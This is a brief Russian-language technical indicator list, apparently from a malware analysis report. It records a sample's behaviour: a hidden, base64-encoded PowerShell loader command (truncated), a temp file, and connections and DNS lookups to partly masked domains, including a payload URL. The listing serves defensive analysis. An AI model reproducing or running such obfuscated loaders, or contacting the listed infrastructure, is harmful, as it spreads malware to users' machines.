Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATw...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1460
- %TEMP%\584379.cvr
- 'gu##any.net':80
- 'mo#####.map.fastly.net':443
- 'co##############e-chains.prod.autograph.services.mozaws.net':443
- http://gu##any.net/zefiro/K/
- '34.##9.100.209':443
- DNS ASK mo#####.map.fastly.net
- DNS ASK gu##any.net
- DNS ASK ya###pin.net
- DNS ASK aa####ravels.com
- DNS ASK tc###xpo.com
- DNS ASK ea###acks.com
- DNS ASK co##she.com
- DNS ASK go####iceshoes.com
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAEUAVAAtAHYAQQByAGkAQQBCAGwAZQAgACgAIgAyADYAIgArACIAOABKAHUAIgArACIANAAiACkAIAAgACgAIAAgAFsAdABZAFAAZQBdACgAJwBTAHkAJwArACcAcwBUACcAKwAnAGUAJwArACcATQAnACsAJwAuAEkATw... (со скрытым окном)